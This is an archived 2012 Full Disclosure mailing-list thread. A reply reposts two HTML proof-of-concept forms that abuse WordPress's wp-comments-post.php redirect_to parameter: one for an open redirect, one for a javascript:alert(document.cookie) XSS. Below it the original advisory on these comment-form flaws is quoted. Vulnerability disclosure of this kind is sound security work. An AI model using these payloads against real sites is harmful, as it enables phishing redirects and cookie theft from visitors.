Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: IAA, Redirector and XSS vulnerabilities in WordPress
From: InterN0T Advisories <advisories () intern0t net>
Date: Sat, 05 May 2012 09:54:02 -0400

Hi List,

To stop MustLive's desperate act of trying to get visitors (and more
backlinks) to his website, I have for those that doesn't want to go to
there, just to see the PoC's but actually read them on this mailing list
like almost _every other_ Proof of Concept / exploit, made them available
below.

Contents of Wordpress Redirector:
<html>
<head>
<title>WordPress Redirector exploit (lol?) (C) 2012 MustLive.
[removed]</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-comments-post.php"; method="post">
<input type="hidden" name="author" value="Test" />
<input type="hidden" name="email" value="test () test test" />
<input type="hidden" name="comment" value="Test" />
<input type="hidden" name="comment_post_ID" value="1" />
<input type="hidden" name="redirect_to" value="http://awebsite.tld"; />
</form>
</body>
</html>
--------------------------------------

Contents of Wordpress XSS:
<html>
<head>
<title>WordPress XSS exploit (lol?) (C) 2012 MustLive. [removed]</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-comments-post.php"; method="post">
<input type="hidden" name="author" value="Test" />
<input type="hidden" name="email" value="test () test test" />
<input type="hidden" name="comment" value="Test21" />
<input type="hidden" name="comment_post_ID" value="1" />
<input type="hidden" name="redirect_to"
value="javascript:alert%28document.cookie%29//" />
</form>
</body>
</html>
--------------------------------------

I don't really have any comments about these "exploits".



Best regards,
Nemesis 3.0


On Sat, 5 May 2012 16:01:53 +0300, "MustLive"
<mustlive () websecurity com ua>
wrote:
Hello list!

I want to warn you about security vulnerabilities in WordPress.

These are Insufficient Anti-automation, Redirector and Cross-Site
Scripting 
vulnerabilities.

-------------------------
Affected products:
-------------------------

Vulnerable are WordPress 2.0 - 3.3.1.

----------
Details:
----------

Already from WP 2.0 there are Insufficient Anti-automation, Redirector
and 
XSS vulnerabilities in wp-comments-post.php. With IAA I've faced just
when 
begun using WP in 2006. If the developers fixed vulnerabilities in
previous 
two redirectors in WP 2.3, then these vulnerabilities were not fixed
even
in 
WP 3.3.1

IAA (WASC-21):

Lack of captcha in comment form allows to conduct automated attacks. The

developers still haven't put captcha in WP comments form (from the first

version of engine), which besides IAA attacks, also allowed to conduct 
Redirector and XSS attacks.

By default in WordPress the premoderation is turned on, and also there
is 
built-in anti-spam filter. But if 10 years ago the premoderation would
be 
enough, then long ago this mechanism couldn't be considered as
sufficient 
protection against spam, and anti-spam filter had efficiency less then
1%
- 
only few from spam messages he marked as spam. And also these mechanisms

don't protect against below-mentioned attacks. Also plugin Akismet is 
bundled with WP, which is "captcha-less" protection against spam. But by

default it's turned off and comparing with captcha it's considered as
less 
efficient and also doesn't protect against below-mentioned attacks.

Redirector (URL Redirector Abuse) (WASC-38):

Exploit:

[Removed]

XSS (WASC-08):

Exploit:

[Removed]

XSS attack is possible on different browsers, but it's harder to conduct

then in case of previous two redirectors (via data URI). At IIS web
servers 
the redirect is going via Refresh header, and at other web servers - via

Location header.

Due to nuances of work of this script (filtering of important symbols
and 
adding of anchor), for execution of JS code it's needed to use tricky
bypass 
methods. This complexity exists as with javascript URI, as with combo 
variant javascript URI + data URI.

Reliable captcha protects against IAA, Redirector and XSS
vulnerabilities.

------------
Timeline:
------------

2012.04.26 - disclosed at my site 

Best wishes & regards,
MustLive
Administrator of Websecurity web site



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault